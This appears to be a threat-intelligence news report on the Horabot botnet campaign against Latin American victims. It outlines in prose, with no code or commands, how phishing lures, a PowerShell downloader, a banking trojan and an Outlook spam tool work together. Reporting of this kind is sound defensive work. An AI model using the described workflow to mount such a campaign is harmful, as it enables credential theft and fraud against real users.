Horabot Malware Targets Latin American Victims

Since late 2020, Spanish-speaking individuals in Latin America have faced a new form of malware known as Horabot. This botnet malware allows a threat actor to take control of a victim's Outlook mailbox, extract email addresses from their contacts, and send phishing emails with malicious HTML attachments to all the addresses in the victim's mailbox. Additionally, the botnet program delivers a Windows-based financial trojan and a spam tool, which are used to gather online banking credentials and compromise Gmail, Outlook, and Yahoo! webmail accounts for the purpose of sending out spam emails.

According to Cisco Talos researcher Chetan Raghuprasad, the majority of infections have been found in Mexico, with a smaller number of victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor responsible for this campaign is believed to be based in Brazil.

The campaign primarily targets users in the accounting, construction and engineering, wholesale distribution, and investment sectors, although it is suspected that other industries in the region may also be affected.

Attack Vector and Mode of Operation

The attack begins with phishing emails that entice recipients with tax-themed lures, encouraging them to open an HTML attachment. This attachment contains a link that leads to a RAR archive. Opening the archive triggers the execution of a PowerShell downloader script, which retrieves a ZIP file containing the main payloads from a remote server and reboots the victim's machine.

The system restart serves as a launching point for the banking trojan and the spam tool, enabling the threat actor to steal data, record keystrokes, capture screenshots, and send additional phishing emails to the victim's contacts.

Chetan Raghuprasad describes this campaign as a multi-stage attack that starts with a phishing email and proceeds to deliver payloads using a PowerShell downloader script and sideloading legitimate executables.

The banking trojan, written in the Delphi programming language, is a 32-bit Windows DLL that shares similarities with other Brazilian malware families like Mekotio and Casbaneiro.

On the other hand, Horabot is a PowerShell-based phishing botnet program specifically designed for Outlook. It propagates the infection by sending phishing emails to all email addresses found in the victim's mailbox, and its purpose is to conceal the threat actor's phishing infrastructure.

This disclosure comes shortly after SentinelOne attributed a prolonged campaign targeting over 30 Portuguese financial institutions to an unknown Brazilian threat actor using information-stealing malware since 2021.

Additionally, a new Android banking trojan called PixBankBot has been discovered, which exploits the accessibility services of the operating system to conduct fraudulent money transfers via the Brazilian PIX payments platform. PixBankBot is the latest in a series of malware specifically targeting Brazilian banks, joining the ranks of BrasDex, PixPirate, and GoatRAT, which have been observed in recent months.